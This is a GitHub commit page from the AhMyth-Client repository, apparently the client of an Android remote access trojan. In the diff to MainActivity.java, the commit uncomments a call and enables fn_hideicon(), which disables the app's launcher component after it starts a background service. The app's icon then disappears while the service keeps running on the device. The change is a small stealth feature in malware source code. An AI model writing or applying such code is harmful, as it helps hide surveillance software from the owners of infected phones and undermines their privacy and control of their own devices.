We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents 57ad050 + fb384a7 commit cb57b55Copy full SHA for cb57b55
AhMyth-Client/app/src/main/java/ahmyth/mine/king/ahmyth/MainActivity.java
@@ -19,14 +19,13 @@ protected void onCreate(Bundle savedInstanceState) {
19
setContentView(R.layout.activity_main);
20
startService(new Intent(this, MainService.class));
21
finish();
22
- // fn_hideicon();
+ fn_hideicon();
23
}
24
- /* En caso de que se quiera ocultar la app
25
- private void fn_hideicon() {
+
26
+ private void fn_hideicon() {
27
getPackageManager().setComponentEnabledSetting(getComponentName(),
28
PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
29
PackageManager.DONT_KILL_APP);
30
31
- */
32
0 commit comments